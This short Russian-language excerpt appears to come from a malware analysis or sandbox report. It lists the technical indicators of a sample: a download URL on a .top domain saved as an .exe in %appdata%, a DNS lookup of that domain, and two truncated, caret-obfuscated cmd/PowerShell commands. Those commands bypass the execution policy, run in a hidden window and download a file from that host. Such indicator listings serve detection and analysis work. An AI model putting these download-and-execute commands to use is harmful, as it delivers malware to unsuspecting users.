Техническая информация
- http://dosehoop.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "POwe^rSheLL.ExE ^-ExecUTi^o^nPOlI^CY^ ^bYp^aSs ^-NOprof^I^L^E -wIND^O^ws^tYLe hIDd^En ^(n^eW-O^B^J^ECT ^sY^Stem.Ne^T^.W^eBc^LIent).Dow^nloA^DfilE(^'http://dosehoop.top/read.php?f=0....
- DNS ASK do###oop.top
- '<SYSTEM32>\cmd.exe' /c "POwe^rSheLL.ExE ^-ExecUTi^o^nPOlI^CY^ ^bYp^aSs ^-NOprof^I^L^E -wIND^O^ws^tYLe hIDd^En ^(n^eW-O^B^J^ECT ^sY^Stem.Ne^T^.W^eBc^LIent).Dow^nloA^DfilE(^'http://dosehoop.top/read.php?f=0....' (со скрытым окном)